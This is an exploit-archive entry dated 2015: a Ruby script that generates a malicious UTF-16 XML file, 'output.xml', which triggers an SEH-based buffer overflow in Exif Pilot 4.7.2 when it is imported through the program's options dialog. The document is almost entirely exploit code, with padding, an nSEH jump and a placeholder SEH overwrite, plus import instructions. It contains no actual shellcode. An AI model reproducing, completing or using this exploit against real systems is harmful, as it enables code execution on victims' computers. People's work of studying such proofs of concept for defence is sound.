Exif Pilot 4.7.2 Buffer Overflow Exploit

#!/usr/bin/env ruby

# Exploit Title: Exif Pilot SEH Based Buffer Overflow

# Version: version 4.7.2

# Download: http://www.colorpilot.com/load/exif.exe

# Tested on: Windows XP sp2

# Exploit Author: Osanda M. Jayathissa

# E-Mail: osanda[cat]unseen.is

=begin

Click Tools > Options > Customize 35mm tab > Import > and choose "output.xml".

The p/p/r addresses contains null characters.

=end

require 'rex'

def generate_content(padding1_len, padding2_len)

header = "\xff\xfe"

header << Rex::Text.to_unicode("<?xml version=\"1.0\" encoding=\"UTF-16\" ?>")

header << "\x0d\x00\x0a\x00"

header << Rex::Text.to_unicode("<efls>")

header << "\x0d\x00\x0a\x00"

header << Rex::Text.to_unicode(" <eflitem>")

header << "\x0d\x00\x0a\x00"

header << Rex::Text.to_unicode(" <maker>");

header << Rex::Text.to_unicode("");

for i in 0..padding1_len

header << Rex::Text.to_unicode("A");

end

header << "\xeb\x00\x06\x00\x90\x00\x90\x00" #nSEH

header << Rex::Text.to_unicode("CCCC"); #SEH

for i in 0..padding2_len

header << Rex::Text.to_unicode("A");

end

header << "\x0d\x00\x0a\x00\x09\x00\x09\x00"

header << Rex::Text.to_unicode(" </maker>")

header << "\x0d\x00\x0a\x00"

header << Rex::Text.to_unicode(" <model>abc</model>")

header << "\x0d\x00\x0a\x00"

header << Rex::Text.to_unicode(" <factor>0.000000</factor>")

header << "\x0d\x00\x0a\x00"

header << Rex::Text.to_unicode(" </eflitem>")

header << "\x0d\x00\x0a\x00"

header << Rex::Text.to_unicode("</efls>")

header << "\x0d\x00\x0a\x00"

return header

end

##

# main

##

filename = 'output.xml'

output_handle = File.new(filename, 'wb')

if !output_handle

$stdout.puts "Cannot open the file #{filename} for writing!"

exit -1

end

header = generate_content(1619, 7000)

$stdout.puts "Generating file #{filename}"

output_handle.puts header

output_handle.close

$stdout.puts "Done!"

exit 0

#EOF

EKU-ID: 4541	CVE:	OSVDB-ID:
Author: Osanda M. Jayathissa	Published: 2015-01-22	Verified:
Download:

Rating